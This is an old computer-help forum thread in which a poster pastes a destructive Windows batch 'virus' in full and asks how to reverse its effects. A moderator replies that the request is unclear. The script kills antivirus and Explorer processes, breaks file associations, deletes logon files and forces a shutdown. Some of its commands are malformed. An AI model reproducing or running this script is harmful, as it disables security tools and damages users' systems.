Welcome guest. Before posting on our computer help forum, you must register. Click here it's easy and free.

Author Topic: bat virus  (Read 3190 times)

0 Members and 1 Guest are viewing this topic.

ucsam

  • Guest
bat virus
« on: January 07, 2011, 07:43:47 PM »
hello everyone,
i am just a normal surfer, while i was going through a website and got a code like below:

title virus is my dna
color 0A
@echo off
set end=md “u cant eascape from me-vishnu”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * andhra pradesh- virus created in karimnagar from jits college
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
cls
msg * hi dude this is begining.
msg * vishnu attcked the system try to challenge him .
DEL C:WINDOWSsystem32logoff.exe /F /Q
DEL C:WINDOWSsystem32logon.exe /F /Q
DEL C:WINDOWSsystem32logon.scr /F /Q
cls
shutdown


and it does the following things:

1. Ends Process, NAVAPSVC.exe
2. Ends Process, Explorer.exe (taskbar and icons will dissapear)
3. Ends Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens

now i want to retrieve of what it has done. Can anyone help me?
i am not a virus maker but just a experimentist, Please help me.. :_:

Allan

  • Moderator

  • Mastermind
  • Thanked: 1260
  • Experience: Guru
  • OS: Windows 10
Re: bat virus
« Reply #1 on: January 08, 2011, 06:21:17 AM »
No idea what you are talking about. What is it you are trying to do?